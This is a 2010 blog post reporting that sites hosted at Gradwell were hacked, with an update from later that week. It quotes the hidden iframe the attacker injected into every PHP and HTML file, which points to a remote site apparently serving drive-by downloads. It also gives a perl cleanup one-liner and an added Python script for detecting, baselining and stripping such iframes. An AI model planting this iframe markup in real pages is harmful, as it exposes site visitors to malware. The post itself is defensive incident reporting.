Gradwell Hacked

I woke up this morning to find all my clients' sites hosted at Gradwell have been hacked.

A quick poke around on domainsbyip.com shows that many other sites hosted on Gradwell's cluster have been similarly altered.

The hacker has added some HTML for a hidden iframe which points to a remote site. Presumably this site serves some sort of drive-by download attack.

Here's the code that is either prepended or appended to all .php and .html files:

<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/" style="display:none"></iframe>

I cleaned up the files as soon as I noticed the attack with this one-liner:

find . \( -name '*.php' -o -name '*.html' \) -print0 | xargs -0 perl -pi -e 's{<iframe src="http://gaccess\.dynsite\.net/blog/wp-content/0wn3d/" style="display:none"></iframe>}{}g'

(NB: this should all be on one line)

The files were re-infected an hour or so later. Re-infection seems to have stopped now.
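The following Python script is an added example, not code from the post or from Gradwell. It does what the one-liner above does and goes a little further: it flags any hidden iframe rather than only the one URL, keeps a SHA-256 baseline of the tree so that a later re-injection shows up as a changed file, and strips the injected markup in place. The directory layout, file names and contents built in run_demo are constructed for illustration, and the assumption that no legitimate page on the host uses a display:none iframe is mine.

```python
"""Detect, baseline and strip hidden-iframe injections across a site tree.

Added example, not code from the original post. Assumes the injected markup is an
<iframe ...></iframe> whose inline style hides it, as the post shows.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# The exact snippet the post reports being prepended or appended to every file.
KNOWN_INJECT = (b'<iframe src="http://gaccess.dynsite.net/blog/wp-content/0wn3d/"'
                b' style="display:none"></iframe>')

# Generalised match: any <iframe> with an inline style that hides it, plus the newline
# that follows a prepended copy. Assumption: legitimate pages on this host never use a
# hidden iframe, so every hit is treated as an injection.
HIDDEN_IFRAME = re.compile(
    rb'<iframe\b[^>]*\bstyle\s*=\s*["\'][^"\']*display\s*:\s*none[^"\']*["\'][^>]*>'
    rb'\s*</iframe>(?:\r?\n)?',
    re.IGNORECASE,
)

# Extensions the attacker touched, per the post.
WEB_EXTENSIONS = {".php", ".html", ".htm"}


def web_files(root):
    """Yield every candidate file under root, including library files outside the web root."""
    root = Path(root)
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in WEB_EXTENSIONS:
            yield p


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Map relative path -> SHA-256 for a known-clean tree. Keep the result somewhere the
    hosting account cannot write, since the attacker had the whole home directory."""
    root = Path(root)
    return {str(p.relative_to(root)): sha256_of(p) for p in web_files(root)}


def find_hidden_iframes(root):
    """Return {relative_path: [matched bytes, ...]} for files carrying a hidden iframe."""
    root = Path(root)
    hits = {}
    for p in web_files(root):
        matches = HIDDEN_IFRAME.findall(p.read_bytes())
        if matches:
            hits[str(p.relative_to(root))] = matches
    return hits


def check_against_baseline(root, baseline):
    """Classify files whose hash differs from the baseline: re-infected (carry the iframe),
    changed for some other reason (needs a manual look), or gone since the baseline."""
    current = build_baseline(root)
    infected = find_hidden_iframes(root)
    changed = [rel for rel, digest in current.items() if baseline.get(rel) != digest]
    return {
        "reinfected": sorted(rel for rel in changed if rel in infected),
        "changed_other": sorted(rel for rel in changed if rel not in infected),
        "missing": sorted(rel for rel in baseline if rel not in current),
    }


def clean_file(path):
    """Strip every hidden iframe from one file in place; return the count removed."""
    p = Path(path)
    cleaned, n = HIDDEN_IFRAME.subn(b"", p.read_bytes())
    if n:
        p.write_bytes(cleaned)
    return n


def run_demo():
    """Constructed sample tree: one page under the web root, one library file outside it."""
    page_src = b"<html><body>Hello</body></html>\n"
    lib_src = b"<?php\n$dsn = 'mysql:host=localhost';\n"
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "public_html").mkdir()
        (root / "lib").mkdir()
        page = root / "public_html" / "index.html"
        lib = root / "lib" / "db.php"
        page.write_bytes(page_src)
        lib.write_bytes(lib_src)
        baseline = build_baseline(root)  # taken while the tree is clean

        # Simulate the injection described in the post: prepended to one file, appended to the other.
        page.write_bytes(KNOWN_INJECT + b"\n" + page_src)
        lib.write_bytes(lib_src + KNOWN_INJECT)

        report = check_against_baseline(root, baseline)
        removed = sum(clean_file(root / rel) for rel in report["reinfected"])
        return {
            "reinfected": report["reinfected"],
            "changed_other": report["changed_other"],
            "removed": removed,
            "clean_after": find_hidden_iframes(root) == {},
            "page_restored": page.read_bytes() == page_src,
            "lib_restored": lib.read_bytes() == lib_src,
        }


if __name__ == "__main__":
    print(run_demo())
```

Against a real account you would run build_baseline once after a clean-up, store the JSON-serialised result off the host, and re-run check_against_baseline on a schedule; anything listed under changed_other deserves a look even though it carries no iframe, since it shows the same write access the injection used.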

The attacker evidently has access to the entire home directory - not just the apache web root - as library files outside the web root were also affected.

I reported the breach to support and am awaiting the outcome.

Luckily for me, the Primesolid site wasn't affected as I no longer host it at Gradwell.

There's a thread about this on uk.net.providers.gradwell.


Peter Gradwell says: there must be some sort of exploit in apache itself so we are also looking at that, and its permissions model.

Update 2010-12-19 10:03

Gradwell have been hacked again this morning.

Exactly the same attack code has been added to all php and html files. Timestamps are updated to 2010-12-19 05:22. :-/

December 15, 2010